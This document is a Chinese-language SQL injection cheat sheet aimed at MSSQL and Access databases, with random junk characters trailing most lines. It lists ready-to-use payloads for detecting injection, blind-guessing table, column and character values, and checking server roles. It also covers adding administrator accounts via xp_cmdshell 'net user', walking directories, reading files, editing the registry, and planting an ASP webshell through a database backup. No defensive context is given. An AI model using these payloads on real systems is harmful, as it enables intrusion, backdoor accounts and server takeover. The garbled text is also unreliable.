1.判断是否有注入;and 1=1 ;and 1=2 av|r^zc
2.初步判断是否是mssql ;and user>0 8NU <lV`
`P/7Mf
3.注入参数是字符'and [查询条件] and ''=' 36MqEUjyB
^U1@
hq*u
4.搜索时没过滤参数的'and [查询条件] and '%25'=' !Q(x A,p
XL
SYE
5.判断数据库系统 }e[;~g\&
'VVEd[
;and (select count(*) from sysobjects)>0 mssql e\o>(is
M18<d1*
;and (select count(*) from msysobjects)>0 access l@:|OGD;8
J4Yu|E<&
abAX)R'
F<R+]M:fa
6.猜数据库 ;and (select Count(*) from [数据库名])>0 )o4B^kq
M`m-@z
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 R1A|g=kF
d#l z^Ls2
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 VAGQR&T?
F`C$F!GE
9.(1)猜字段的ascii值(access) \Z~|ry0v{d
M^C|svm
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 kF,_o/Jc
]!%
p21e
(2)猜字段的ascii值(mssql) V@%:y tDf
8Qm%T7]UFb
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 kx3?'=0;5
4n}tDHvd
10.测试权限结构(mssql) /^Ckk
qhE1
7Hf
wgETL|3-
#Cy9E"lP
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ^/`W0kT
coG_bX?e
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ;^yR,32F
E$8D^Zt
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- hv4om+
JJE3\
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- %]U'
>)+-:
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- Pjvzefp
z+~klv3
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- Of@LEEh6
qG&}lg?g{
;and 1=(select IS_MEMBER('db_owner'));-- [p:mja.6y
655OL)|cD6
BSyl!>G6n8
A
,$CYLj+
11.添加mssql和系统的帐户 1Uy'TEk
D# Gf.c
;exec master.dbo.sp_addlogin username;-- He1hgJ)N
;exec master.dbo.sp_password null,username,password;-- Lo{g0~?x*
,SZYZ 25
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Vs"1:gi&
9$~a&lXO5
;exec master.dbo.xp_cmdshell 'net user username password ^J]_O_ee$
1+Z@4;fk
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- kWZ@v+Mk3
8mh@C6U
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 2d60o~E
B3';Tcs
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- !yQ%^g`
m|by^40A(
.{8?eze[m
y$Rh$eK
12.(1)遍历目录 bd$``(b`v
hN"cXz"/
;create table dirs(paths varchar(100), id int) ZR[6-
H'_ v
;insert dirs exec master.dbo.xp_dirtree 'c:\' N~)RR {$w
+N>z|T<
;and (select top 1 paths from dirs)>0 "?n;dXYSi
|!?lwBs4
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) n~mP7X%wE7
O,_k.EH
;4s7\9o
V/@7XAt
(2)遍历目录 }Nc Ed;
']__V[
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- twr-+rm2
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 a)qlrtCl
p\G1O*Z
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 mJYG k_ua
M/5+AsT
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 %s),4
NxGSs_7
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 87ptab@
DPM4v7 S
PZYVLUw
`
3[cGSI"+
13.mssql中的存储过程 #J`MR05
~RU-N%Kn
xp_regenumvalues 注册表根键, 子键 VC.zmCglo^
^$x1~}D
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 mFx\[S
8}.V[,]6
xp_regread 根键,子键,键值名 ,1e\}^
dUc([&
;exec xp_regread Fu\!'\6
|FP@NUX\
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 go!jx6~;x
<6STw
xp_regwrite 根键,子键, 值名, 值类型, 值 \}EJtux q
"Gc\"'^r
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ]wHXrB8vx
o!Y61S(
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 m2>$)\-;
<gLq?~e|A
xp_regdeletevalue 根键,子键,值名 myqQqVW
$l/w.z
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 %j.
*YvveW
d8N4@3 CkL
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 BRF4p:
()ZP=\L
0kxe5*-|
N+CcWs!E
14.mssql的backup创建webshell 8umW>
"YoFUfaNg
use model byN4?3F
+BgUnu26
create table cmd(str image); +Cs.v.GA5
*f
k3IvAXu
insert into cmd(str) values (''); &2//\Qz
dz,4);Mg
backup database model to disk='c:\l.asp'; ueu=$.^;g
U*cWNn:."
jVInTR0f[
?,oE_H
15.mssql内置函数 @tVl8]y
PD`EtkUnv
;and (select @@version)>0 获得Windows的版本号 :IRQouTf:,
<ql:n
;and user_name()='dbo' 判断当前系统的连接用户是不是sa k!ac_}&NNv
RWdx)qj{
;and (select user_name())>0 爆当前系统的连接用户 m=qyPY
Po7oo9d
;and (select db_name())>0 得到当前连接的数据库 6(-c$d`C.0
C sx
EN4
,.TwM;w=
Igb%bO_
16.简洁的webshell Bs';!,=
Dfw%Bu
use model uE^5o\To
o0#zk
create table cmd(str image); vg-'MG
oG'
'my#3
insert into cmd(str) values (''); =aCd,4B}
R~N'5#.*M
backup database model to disk='g:\wwwtest\l.asp';